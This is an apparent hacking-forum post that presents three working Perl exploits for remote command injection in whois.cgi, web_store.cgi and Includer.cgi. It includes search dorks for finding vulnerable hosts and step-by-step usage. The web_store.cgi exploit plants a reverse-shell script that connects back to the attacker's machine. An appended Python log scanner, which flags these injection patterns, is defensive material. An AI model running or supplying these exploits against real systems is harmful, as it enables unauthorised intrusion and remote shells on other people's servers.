Exploiting Whois.cgi, web_store.cgi and Includer.cgi

Started by C00L3R, 11 December 2008, 12:07:17 PM


C00L3R

In this post I will be showing how to exploit some hosts with vulns in "CGI",
which is not so popular but is a devastating attack that can come back with
a shell in seconds or minutes...

Here is an exploit that is simple to use and easy to understand:
#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - m.v.berkum@obit.nl #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #
# #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite #
# Greets to sigmo for finding stupid POST examples #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;)) #
# #
# Use like this: #
# ./whois.pl http://www.ifyoureadthisyouaregay.com "ls -al" #
###############################################################

use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;

$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length

host=%7c$command\n\n";
sleep(3); # change to lower or higher, depending on your connection
sysread($sock, $buffer, 100000);
($empty, $output) = split(/PRE/, $buffer);
$output =~ s/[\<\>\/]//g;
if($output) {
print("$output\n");
} else { print "No data, or not vulnerable\n";
}
}
close $sock;


# milw0rm.com [2001-01-12]

Like many Perl exploits, it uses a socket to connect to port 80, connecting to
the vulnerable "URL". The "dork" to search for vulnerable hosts is
"allinurl:whois.cgi". Once you find the host, just compile the program with the
example string:
"./whois.pl http://www.site.com/cgi-bin/whois.cgi "ls -al" "
This way the exploit successfully exploits the flaw; the exploit itself has a commented example in its source...

Another remote CGI exploit:
#!/usr/bin/perl -w
#
#*******************************************************************************
# Remote Command Execution Vulnerability In Web_store.cgi
#
# [SegmentationFault Group]
#
# Greetz to : Xsupr3mo - failed - Status-x - Stealh - P3S4D3L0
# Greetz to : berhooz - nima - ehsan - Unknown OutLaw eutanasia
# http://www.ashiyane.com
#
#*******************************************************************************
# ok step by step to work:
# [*] start exploit
# [*] run in your system: nc -l -vv -p 2975
# [*] starting connect back on 127.0.0.1 :2975
# [*] DONE!
# [*] Look netcat windows
#
# If connect back shell not found, maybe:
# * you do not have perm to write in /tmp
# * Shell not vulnerable
# * test and put in /$path/hints.pl?|cd /tmp other path that u know dont have perm
#*******************************************************************************
###############################################################################
use IO::Socket;

print "*****************************************************************\n";
print "\tRemote Command Execution Vulnerability in web_store.cgi\n ";
print "\t\t-=[ SegmentationFault Group ]=-\n";
print "\t\tcode writen by sun-os [ActionSpider]\n\n";
print "\tGerttz to : Xsupr3mo - failed - Status-x - Stealh";
print "\n\tand : Behrooz - nima - ehsan http://www.ashiyane.com\n";
print "*****************************************************************\n\n";


print "enter hostname or ip : \n";
chomp($server=<STDIN>);

print "port: (default: 80)\n";
chomp($port=<STDIN>);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );

print "path: (???/web_store.cgi?)\n";
chomp($path=<STDIN>);

print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>);

print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>);

print "ok Remote Command Execution now Start";
print "|+| try to exploiting...\n";

$string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip $reverse|";

print "|+| OK! \n";
print "|+| NOW, run in your system: nc -l -vv -p $reverse\n";
print "|+| starting connect back on $ip :$reverse\n";
print "|+| DONE!\n";
print "|+| Look netcat windows\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)
or die;

print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: blackbox\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "have nice shell...";

# milw0rm.com [2005-06-15]


This exploit is nice and easy to understand. It is a bit old, but it is still possible to see vulnerable hosts; the dork here is "web_store.cgi". The variables are given after compilation, so just compile it and the exploit will prompt for the data to assign to the variables...
e.g.: $./exploit.pl or $perl exploit.pl

On to the last example:
#!/usr/bin/perl
#
# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r]
#
# C0d3d By K-C0d3r, a http://www.x0n3-h4ck.org friend!
#
# I think the bug was discovered by Francisco Alisson.
#
# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm.
#
# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b.
#
##########################################################################
# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1
# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]
# [?] Insert command: id
# [+] Conecting to 127.0.0.1
# [+] Connected to 127.0.0.1
# [+] Injecting command ...
# uid=500(kc) gid=500(kc) gruppi=500(kc)
# [kc@K-C0d3r xpl]$
##########################################################################

use IO::Socket;

sub Usage {
print STDERR "Usage:\nKCinc-xpl.pl <www.victim.com> </path/to/includer.cgi> <exploitation_type>.\n";
print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n";
exit;
}

if (@ARGV < 3)
{
Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n";
print "[?] Insert command: ";
$command = <STDIN>;
$type = @ARGV[2];

if ($type > 2)
{
Usage();
}


print "[+] Conecting to $host\n";

if ($type = 1)
{
$injection = "$host$path?|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
print $_;
exit;
}
}

if ($type = 2)
{
$injection = "$host$path?template=|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
print $_;
exit;
}
}


This last exploit is very simple, made with a socket and two "IF"s, one for each
choice by the user of the program, that is, choosing the exploitation type "Includer.cgi?" or "includer.cgi?template=". The exploit itself shows the user a usage example
when run...

As presuntinho says:
W-well, th-that's all f-f-folks  :D
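From the defender's side, the three exploits above share one pattern: a shell metacharacter (here `|`) smuggled into a CGI parameter. The following Python is an added example, not code from the post or from any of the exploit authors: it decodes request targets (and, for whois.cgi, a POST body passed in separately) and flags metacharacters aimed at the three scripts; the log lines, client addresses and paths are constructed samples.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# The three CGI scripts targeted in the post above.
WATCHED_SCRIPTS = {"whois.cgi", "web_store.cgi", "includer.cgi"}
# Shell metacharacters that make a CGI parameter a command; the exploits above all use "|".
META = re.compile(r"[|;`\n]|\$\(")
# Common Log Format: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" \d{3}')

def decode_params(target, body=""):
    """(script name, [(name, value), ...]) with %xx and '+' decoded; a bare
    query such as includer.cgi?|id| yields the pair ('|id|', '')."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    raw = "&".join(p for p in (parts.query, body) if p)
    pairs = []
    for pair in raw.split("&"):
        name, _, value = pair.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return script, pairs

def suspicious_params(target, body=""):
    """Decoded pairs of a watched script that carry shell metacharacters.
    Pass a POST body separately: access logs only keep the query string."""
    script, pairs = decode_params(target, body)
    if script not in WATCHED_SCRIPTS:
        return []
    return [(n, v) for n, v in pairs if META.search(n) or META.search(v)]

def scan_log(lines):
    """(ip, method, target, hits) for every line that looks like command
    injection against one of the watched scripts."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = suspicious_params(m["target"])
            if hits:
                findings.append((m["ip"], m["method"], m["target"], hits))
    return findings

# Constructed sample log lines (not real traffic): the first three mirror the
# injection patterns used by the exploits above, the last two are benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2009:10:00:00 +0000] "GET /cgi-bin/includer.cgi?|id| HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2009:10:00:03 +0000] "GET /cgi-bin/includer.cgi?template=%7Cid%7C HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2009:10:01:00 +0000] "GET /cgi-bin/web_store.cgi?page=.html%7Ccd+/tmp%3Bid%7C HTTP/1.1" 200 1024',
    '192.0.2.9 - - [01/Jan/2009:10:02:00 +0000] "GET /cgi-bin/web_store.cgi?page=index.html HTTP/1.1" 200 4096',
    '192.0.2.9 - - [01/Jan/2009:10:02:05 +0000] "GET /index.html?x=%7Cid%7C HTTP/1.1" 404 2048',
]
```

`scan_log(SAMPLE_LOG)` returns the three injection attempts; the whois.cgi case is only visible when the web server or a proxy logs request bodies, e.g. `suspicious_params("/cgi-bin/whois.cgi", "host=%7cls+-al")`.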